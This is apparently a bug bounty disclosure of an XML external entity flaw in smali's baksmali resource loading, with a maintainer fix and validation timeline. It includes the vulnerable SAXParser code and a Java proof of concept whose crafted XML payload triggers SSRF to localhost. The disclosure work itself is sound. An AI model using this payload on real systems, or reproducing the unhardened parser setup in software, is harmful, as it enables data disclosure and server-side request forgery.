Improper Restriction of XML External Entity Reference in jesusfreke/smali

Valid

Reported on

Jan 16th 2022

Description

The loadResourceIds() function makes use of SAXParser generated from a SAXParserFactory with no FEATURE_SECURE_PROCESSING set, allowing for XXE attacks. In https://github.com/JesusFreke/smali/blob/cbd41d36ccde221ccc4ec2aa0c15ca2fa4491a62/baksmali/src/main/java/org/jf/baksmali/BaksmaliOptions.java#L87

        SAXParser saxp = SAXParserFactory.newInstance().newSAXParser();
                final String prefix = entry.getKey();
                saxp.parse(entry.getValue(), new DefaultHandler())

Proof of Concept

Extracted out the key function mentioned above to showcase how it can be exploited.

import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.HandlerBase;

import java.io.ByteArrayInputStream;

public class Poc {

    public static void main(String[] args) {        
        try {
            String xmlpoc = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1/\">]><foo>&xxe;</foo>";
            SAXParser saxParser = SAXParserFactory.newInstance().newSAXParser();
            saxParser.parse(new ByteArrayInputStream(xmlpoc.getBytes()), new HandlerBase());
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Causes an SSRF to http://127.0.0.1

Impact

This vulnerability is capable of XXE to disclose data/conduct SSRF attacks etc.

We are processing your report and will contact the jesusfreke/smali team within 24 hours. 2 years ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 years ago
We have contacted a member of the jesusfreke/smali team and are waiting to hear back 2 years ago
We have sent a follow up to the jesusfreke/smali team. We will try again in 7 days. 2 years ago
We have sent a second follow up to the jesusfreke/smali team. We will try again in 10 days. 2 years ago
We have sent a third and final follow up to the jesusfreke/smali team. This report is now considered stale. 2 years ago
jesusfreke
2 years ago

Maintainer

This should be fixed by https://github.com/JesusFreke/smali/commit/178d0c277aa8930a7334da638fa77aff10f2b5ac

ready-research
2 years ago

Researcher

@maintainer Can you please validate this report by clicking on Mark as valid and also confirm the fix. Thank you.

ready-research
2 years ago

Researcher

@admin Can you please validate this report on behalf of @maintainer, as he agreed and fixed the issue? https://github.com/JesusFreke/smali/commit/178d0c277aa8930a7334da638fa77aff10f2b5ac https://github.com/JesusFreke/smali/commit/2771eae0a11f07bd892732232e6ee4e32437230d

Jamie Slome validated this vulnerability 2 years ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Jamie Slome marked this as fixed in Not released yet with commit 2771ea 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
BaksmaliOptions.java#L87 has been validated
to join this conversation